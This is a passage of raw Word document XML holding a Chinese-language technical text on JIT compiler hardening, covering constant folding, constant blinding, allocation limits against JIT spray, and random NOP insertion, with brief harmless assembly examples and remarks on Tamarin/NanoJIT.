          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>禁用恒定折叠：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2F4987" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17248953" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="73"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x41424344</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB5015A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E01CF7C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>启用恒定折叠：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76819033" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="29"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18A5EDD3" w14:textId="77777777" w:rsidR="005C7515" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="1" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="7977"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">0x4142 mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x4344</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6385F1A8" w14:textId="31707F22" w:rsidR="0026102A" w:rsidRDefault="005C7515">
      <w:pPr>
        <w:spacing w:before="1" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="7977"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2494A10F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="23"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74F38CEB" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_bookmark17"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>持续致盲</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7216B9" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="39"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39DE7AB8" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="434"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>常量盲化涉及</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过在发射时对攻击者提供的常量与随机值进行XOR运算来进行更改。攻击者提供的常量A与秘密值B进行XOR运算以生成C。在运行时，B与C进行XOR运算以再次生成A。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2716B192" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA707E1" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>恒盲禁用</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE6146A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BA9D988" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>mov eax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0x41424344</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0B2AFF" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D7D4464" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="143"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>启用恒定盲</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B57C4E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="226E9D38" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="264" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="8799"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>ecx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>ecx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="089241DE" w14:textId="4B5D5457" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="21"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>A =</w:t>
      </w:r>
      <w:r w:rsidR="005C7515">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005C7515">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005C7515">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6DF590ED" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00C5C58B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="143" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="488"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>此技术可确保在指令流中不会保留任何恶意数据，而其原始形式仍会保留</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E381946" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="092E599E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_bookmark18"/>
      <w:bookmarkEnd w:id="20"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>分配限制</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5230B067" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="39"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30EC4D7D" w14:textId="41D4B1E9" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="435"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>启用并利用ASLR后，攻击者通常会依靠JIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Spray攻击，用</w:t>
      </w:r>
      <w:r w:rsidR="005C7515">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">（通过常量）填充尽可能多的地址空间，以增加分支到正确地址的几率。这会产生数百兆或更大的分配。 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JIT引擎在正常运行期间很少产生那么多本机代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746587BA" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7614EA2C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="488"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JIT分配限制限制了JIT引擎可以分配的页面数。这可以帮助防止攻击而又不妨碍浏览器的正常运行，但是对于JIT支持的语言运行时可能有缺点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6880B7" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="131EA128" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="449"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这种保护在浏览器中很有意义，因为标准的工作量是可以预测的，但在诸如JVM / CLR之类的通用JIT或诸如LLVM之类的库中可能并不总是合适的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1919499C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A29A37C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="77"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_bookmark19"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>随机NOP插入/随机码基本偏移</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A71C6A2" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="39"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69DDEE9E" w14:textId="617C9919" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ASLR严格来说是一种链接阶段/负载阶段（现在称为发射阶段）保护机制，因此只能以页面分辨率随机分配地址。代码生成器是确定性的，并且直接受高级源语言的影响。因此，在成功进行JIT</w:t>
      </w:r>
      <w:r w:rsidR="005C7515">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> spray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的情况下，很容易预测页面内偏移。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02182554" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="735CB9A4" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="283" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="421"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>以随机数量的语义无操作指令开始每个发出的函数或代码块，可以增加页面或代码段内的熵，并帮助JIT实现动态加载</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>库无法</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实现的随机化。 NOP也可以散布在JIT发出的整个代码中，以进一步降低可重用代码块的可预测性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474AB646" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="183F895A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="449"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Tamarin是Adobe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Flash播放器中的JIT引擎，它与TraceMonkey共享NanoJIT引擎</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">。 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2010年，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NanoJIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的开发人员向引擎添加了两个配置选项：随机NOP插入和随机代码库偏移。不幸的是，开发人员从未启用这些功能。此外，塔玛琳（Tamarin）开发人员还决定在编译代码修改时关闭这些保护。 Tamarin中的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>thunk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>被定义为对可信C存根函数的调用，例如</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Math_floor_thunk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（）或XML_AS3_toString_thunk（）。这些函数可能不包含攻击者可控制的常量，但可能包含可重用的代码块。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58850714" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="026D6BC0" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="273" w:lineRule="auto"/>
        <w:ind w:left="928" w:right="4095"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
